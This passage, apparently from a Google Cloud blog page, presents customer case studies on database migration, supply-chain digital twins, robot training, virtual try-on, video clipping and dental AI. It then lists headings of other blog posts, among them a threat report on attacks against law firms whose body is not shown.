Why it matters: The migration to AlloyDB has fundamentally reshaped URBN’s data strategy, delivering a more favorable total cost of ownership through an optimized storage and compute architecture, without sacrificing performance or reliability. Furthermore, the shift to a PostgreSQL-compatible database gave URBN the flexibility of an open-source ecosystem, providing freedom from vendor lock-in, as well as significant speed improvements that enhanced responsiveness.

Learn from us: "URBN’s successful migration serves as a blueprint for organizations looking to modernize their mission-critical infrastructure and future-proof their environment for AI expansion. This journey proves that even the most complex, mission-critical migrations can be achieved through deep cross-organizational partnership and a phased, risk-mitigated approach." – Rob Frieman, CIO, Urban Outfitters & Raj Pai, VP, Product Management, Databases, Google Cloud

BASF manages supply chain decisions with AlphaEvolve

Who: BASF Agricultural Solutions manages a complex network of 180 production sites with more than 5,000 distinct value chains. Currently, human planners make thousands of local decisions every day on what to produce, when to produce it, and how much safety stock to hold.

What they did: To understand how local decisions ripple across their entire global network, BASF turned to AlphaEvolve on Google Cloud to build a digital twin of their supply chain. In collaboration with Google Cloud and prognostica GmbH, BASF fed the model three years of historical data and then generated variations of the code, mutating the logic to see if it could simulate a supply chain that matched the real-world historical data.

Why it matters: By running thousands of experiments, AlphaEvolve developed a clear, human-readable algorithm that explains how the BASF network truly operates. The final algorithm successfully mirrored the actual historical performance of the supply chain, significantly reducing the error rates compared to the initial seed model. It automatically discovered factually correct, domain-specific supply chain rules, providing a clear foundation for optimizing asset utilization globally.

Learn from us: “We had several attempts to build a digital twin. … By using AlphaEvolve, we cannot only map the complex network based on system data, but at the same time understand and copy the human decisions that drive our daily operations.” – Dr. Goetz Krabbe, vice president for global supply chain at BASF

UKG unlocks real-time workforce intelligence at scale

Who: UKG is one of the leading providers of human capital management (HCM) and workforce management (WFM) solutions, but years of growth led to backend sprawl. They have 126 application teams, dozens of tech stacks, and more than 12,000 database instances.

What they did: To bring the full UKG suite onto one real-time foundation, the company built People Fabric, a new data and intelligence platform powered by AlloyDB for PostgreSQL and the just-announced Agentic Data Cloud. They created a custom change data capture (CDC) framework to extract changes from existing operational databases, and for larger analytical workloads, the same data flows into BigQuery, while Cloud SQL holds the metadata and tenancy context.

Why it matters: People Fabric gives UKG a complete and consistent view of people, work, pay, and culture data that’s updated continuously and ready for AI to use in real time. For engineering teams, People Fabric acts as a database-as-a-service that accelerates development and supports modernization without customer disruption. Additionally, migrating core person and employment data off their on-prem monolith has generated cost savings significant enough to fund half of People Fabric.

Learn from us: “As we continue expanding People Fabric, we’re laying the groundwork for deeper agentic automation, more responsive analytics, and a growing set of AI-driven capabilities — all on a trusted, scalable foundation built for what’s next.” – Radhi Chagarlamudi, Group Vice President, Product Engineering, UKG & Heather White, Cloud Data Architect, Google Cloud

WPP accelerates humanoid robot training 10x with G4 VMs

Who: WPP is one of the world’s largest marketing organizations, handling $70 billion of media for enterprise clients. They work on some of the most complex commercial film shoots and were eager to test the viability of robotic cameras to capture more footage, but this required complex training of physical models AI.

What they did: WPP used the new G4 VM instance powered by NVIDIA RTX PRO 6000 Blackwell on Google Cloud to tackle the unique challenges of training physical AI for robotics in videography settings. After capturing human motion with the OptiTrack mocap system, they undertook reinforcement learning using the AI Hypercomputer together with the NVIDIA Isaac Sim image. MuJoCo, an open source physics engine by Google DeepMind, was a critical piece of simulation software that validated accuracy continuously, in real-time.

Why it matters: WPP was able to utilize a P2P topology that moves data directly between GPUs without the bottleneck of central processing. They saw speed increases in excess of 10x, taking training times down to less than one hour. Through high-volume simulation, the humanoid robots learned how to respond to small changes and bridge the tough "sim-to-real" gap, helping ensure the robot's simulated adaptability translated to safety and stability in the real world.

Learn from us: "Our process for mastering complex, natural movement on a film set can be replicated across industries to overcome the massive computational complexity of training robots." – Perry Nightingale, SVP of Creative AI, WPP

Breuninger boosted sales with its "be your own model" AI

Who: Breuninger, a fashion and lifestyle company based in Germany, thought emerging generative media models could be a good fit to answer the question every online fashion shopper asks: "How will this look on me?"

What they did: Working with Google Cloud, they built a virtual try-on experience that lets shoppers see high-end fashion on their own bodies using a simple selfie. Using the Virtual Try-On (VTO) API, Breuninger’s data team worked directly with Google’s engineers to test and refine the technology in three stages, ultimately moving from pre-selected models to a user-first, selfie-based approach. The project was also part of Breuninger’s move to a Flutter-based platform, which helped the team move from its vision to a live launch in only three months.

Why it matters: During a six-week A/B test over Black Week and the holiday season, the team found that shoppers who used the virtual try-on converted purchases at a higher rate than those who didn't. Customer surveys reinforced the numbers: shoppers responded well to the high image quality and the personalized experience.

Learn from us: “Breuninger continues to refine the experience based on how customers actually use virtual try-on in everyday shopping — the same user-first approach that shaped the project from the start.” – Daniel Rascher, Senior Product Owner, Breuninger & Dr. Michael Menzel, Customer AI Specialist, Google Cloud

Glance turns hours of video into mobile-ready clips

Who: Glance, a mobile-first content platform, processes 1-2 hour videos from sources like podcasts, news reports, movies, and web series, and transforms them into 30 to 180-second vertical clips optimized for mobile lock screens.

What they did: The goal was to create a complete pipeline that takes a long-form landscape video (16:9) and outputs multiple ready-to-publish short-form portrait videos (9:16). The final technical solution uses Google Cloud Speech-to-Text v2, Gemini, and the Google Vision API, combined with custom video manipulation using Samurai (an open-source object tracking tool), OpenCV and MoviePy. The process involves audio extraction, speech-to-text transcription, and using Gemini 2.5 Flash to analyze transcript text and identify optimal start and end timestamps for short video clips.

Why it matters: With daily volume projected to grow from 3,500 to over 10,000 videos per day, manual editing wasn’t a realistic path forward. Glance’s video pipeline demonstrates what becomes possible when AI handles the repetitive, judgement-intensive work of video editing. The system transforms thousands of long-form videos into mobile-ready clips each day, preserving narrative context while optimizing for vertical viewing. Rather than choosing between scale and quality, automated pipelines can deliver both.Learn from us: “Glance’s video pipeline demonstrates what becomes possible when AI handles the repetitive, judgement-intensive work of video editing. … The approach offers a template for any organization sitting on long-form video archives. Rather than choosing between scale and quality, automated pipelines can deliver both.” – Himanshu Aggarwal,

Machine Learning Engineer, Glance & Sharmila Devi, AI Consulting Lead, Google Cloud

Movix fills a gap in dental skills with specialized agentic AI

Who: Movix is building one of the first agentic AI solutions for dental appliance manufacturers and dental labs, to help solve a serious shortage of skilled dental technicians in aligner manufacturing.

What they did: Movix developed custom models for deep learning, computer vision, and 3D mesh analysis over a five-month period, using Google Cloud infrastructure. Once defects are detected, they use the Gemini Enterprise Agent Platform to generate client-facing feedback that reads as if it came directly from a human technician. Their 3D models use Cloud Run with L4 GPUs for the massive compute power required, and they use Compute Engine VMs to run experiments and train models.

Why it matters: Movix’s agentic solutions automate data entry and quality control, which are traditionally manual, time-consuming, and error-prone tasks. The automation and higher level of accuracy the QC agent delivers can save $300 per remake for an aligner manufacturer, and speed up the appliance manufacturing process with quicker turnaround times.

Learn from us: “We plan to build hybrid solutions … designing an architecture that connects our cloud-based AI agents with older, on-premises software that many conservative labs still use — through lightweight local connectors and standardized APIs. This will allow us to access a large market segment that has not yet migrated to the cloud.” – Marina Domracheva, CEO, Movix & Bakit Dzhumagulov, CTO, Movix

Cloud Blog

What’s new with Google Cloud

Jun 1 - Jun 5

May 25 - May 29

May 18 - May 22

May 11 - May 15

Apr 27 - May 1

Apr 20 - Apr 24

Apr 13 - Apr 17

Apr 6 - Apr 10

Mar 30 - Apr 3

Mar 23 - Mar 27

Mar 16 - Mar 20

Mar 9 - Mar 13

Mar 2 - Mar 6

Feb 23 - Feb 27

Feb 9 - Feb 13

Jan 26 - Jan 30

Jan 19 - Jan 23

Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms

Introduction

Threat Detail

Initial Access via IT Helpdesk Impersonation

Remote Screen Control and Legitimate Tool Abuse

Screen-Sharing Utilities

Commercial RMM Agents

Message Delivery via Privnote

Infrastructure Pivoting and Local Staging

Data Theft

Threat Actor Extortion Tactics

Sample Extortion Email

Data Leak Site

Suspected UNC3753 Activity Involving Physical Access

Attribution

Remediation and Hardening

User Education

Physical Access and Verification Policies

Remote Access Conditional Access Controls

Enforce Strict RMM and Screen-Sharing Software Controls

Endpoint Removable Media Hardening

Network Monitoring and Egress Control

Application Log and Access Auditing

Outlook and Implications

Data Leak Site (DLS)

Phishing Domains

Indicators of Compromise (IOCs)

Google Security Operations (SecOps)

MITRE ATT&CK

What's new for Managed Service for Apache Spark clusters

Faster, with the Lightning Engine native execution engine

Learn technical details and hear Lowe’s experience with Lightning Engine

Easier: Maximize resource obtainability via Flexible VMs

Easier: Zero-scale clusters and scheduled stops

Smarter: Managed Service for Apache Spark MCP Server

Smarter: Accelerating AI with the Data Agent Kit

Smarter: Next-generation Lakehouse

Next-gen runtimes: Cluster Image 3.0 with Spark 4.1

Get started today

What’s new with Google Data Cloud

June 1 - June 5

May 11 - May 15

April 20 - April 24

April 13 - April 17

April 6 - April 10

March 23 - March 27

March 16 - March 20

February 23 - February 27

February 16 - February 20

February 2 - February 6

January 26 - January 30

January 19 - January 23

January 12 - January 16

What’s new with Google Data Cloud - 2025

Scaling AI Agents: A Step-by-Step Guide to Deploying ADK on GKE Autopilot

Understanding the GKE ADK Architecture

Prerequisites

Step 0: Configuring Google Cloud and Authentication

Step 1: Provisioning GKE Autopilot

Step 2: Building the Agent with ADK

Step 3: Testing the Agent Locally